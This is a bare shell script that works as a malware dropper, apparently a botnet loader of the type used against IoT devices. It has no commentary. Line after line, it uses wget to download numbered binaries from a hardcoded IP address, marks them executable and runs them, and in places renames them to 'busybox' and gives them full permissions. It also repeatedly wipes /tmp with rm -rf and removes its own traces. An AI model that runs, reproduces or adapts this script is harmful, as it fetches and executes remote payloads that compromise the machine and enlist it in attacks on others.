#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.80.128.196/bin1; chmod +x bin1; ./bin1; rm -rf bin1
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.80.128.196/bin2; chmod +x bin2; ./bin2; rm -rf bin2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.80.128.196/bin3; chmod +x bin3; ./bin3; rm -rf bin3
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.80.128.196/bin4; chmod +x bin4; ./bin4; rm -rf bin4
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.80.128.196/bin5; chmod +x bin5; ./bin5; rm -rf bin5
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.80.128.196/bin6; chmod +x bin6; ./bin6; rm -rf bin6
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.80.128.196/bin7; chmod +x bin7; ./bin7; rm -rf bin7
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.80.128.196/bin8; chmod +x bin8; ./bin8; rm -rf bin8
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.80.128.196/bin9; chmod +x bin9; ./bin9; rm -rf bin9
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.80.128.196/bin10; chmod +x bin10; ./bin10; rm -rf bin10
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.80.128.196/bin11; chmod +x bin11; ./bin11; rm -rf bin11
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.80.128.196/bin12; chmod +x bin12; ./bin12; rm -rf bin12
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.80.128.196/bin13; chmod +x bin13; ./bin13; rm -rf bin13
ulimit -n 712
cd /tmp;rm -rf *;wget http://185.80.128.196/bin1;cat bin1 >busybox;chmod 777 busybox;./busybox
cd /tmp;rm -rf *;wget http://185.80.128.196/bin2;cat bin2 >busybox;chmod 777 busybox;./busybox
cd /tmp;rm -rf *;wget http://185.80.128.196/bin3;cat bin3 >busybox;chmod 777 busybox;./busybox
cd /tmp;rm -rf *;wget http://185.80.128.196/bin7;cat bin7 >busybox;chmod 777 busybox;./busybox
cd /tmp;rm -rf *;wget http://185.80.128.196/bin8;cat bin8 >busybox;chmod 777 busybox;./busybox
cd /tmp;rm -rf *;wget http://185.80.128.196/bin4;cat bin4 >busybox;chmod 777 busybox;./busybox
cd /tmp;rm -rf *;wget http://185.80.128.196/bin5;cat bin5 >busybox;chmod 777 busybox;./busybox
cd /tmp;rm -rf *;wget http://185.80.128.196/bin6;cat bin6 >busybox;chmod 777 busybox;./busybox
cd /tmp;rm -rf *;wget http://185.80.128.196/bin9;cat bin9 >busybox;chmod 777 busybox;./busybox
cd /tmp;rm -rf *;wget http://185.80.128.196/bin10;cat bin10 >busybox;chmod 777 busybox;./busybox
cd /tmp;rm -rf *;wget http://185.80.128.196/bin11;cat bin11 >busybox;chmod 777 busybox;./busybox
rm -rf /tmp/*

ulimit -n 712
cd /tmp;rm -rf *;wget http://185.80.128.196/bin1;cat bin1 >busybox;chmod 777 busybox;./busybox
cd /tmp;rm -rf *;wget http://185.80.128.196/bin2;cat bin2 >busybox;chmod 777 busybox;./busybox
cd /tmp;rm -rf *;wget http://185.80.128.196/bin3;cat bin3 >busybox;chmod 777 busybox;./busybox
cd /tmp;rm -rf *;wget http://185.80.128.196/bin7;cat bin7 >busybox;chmod 777 busybox;./busybox
cd /tmp;rm -rf *;wget http://185.80.128.196/bin8;cat bin8 >busybox;chmod 777 busybox;./busybox
cd /tmp;rm -rf *;wget http://185.80.128.196/bin4;cat bin4 >busybox;chmod 777 busybox;./busybox
cd /tmp;rm -rf *;wget http://185.80.128.196/bin5;cat bin5 >busybox;chmod 777 busybox;./busybox
cd /tmp;rm -rf *;wget http://185.80.128.196/bin6;cat bin6 >busybox;chmod 777 busybox;./busybox
cd /tmp;rm -rf *;wget http://185.80.128.196/bin9;cat bin9 >busybox;chmod 777 busybox;./busybox
cd /tmp;rm -rf *;wget http://185.80.128.196/bin10;cat bin10 >busybox;chmod 777 busybox;./busybox
cd /tmp;rm -rf *;wget http://185.80.128.196/bin11;cat bin11 >busybox;chmod 777 busybox;./busybox
rm -rf /tmp/*
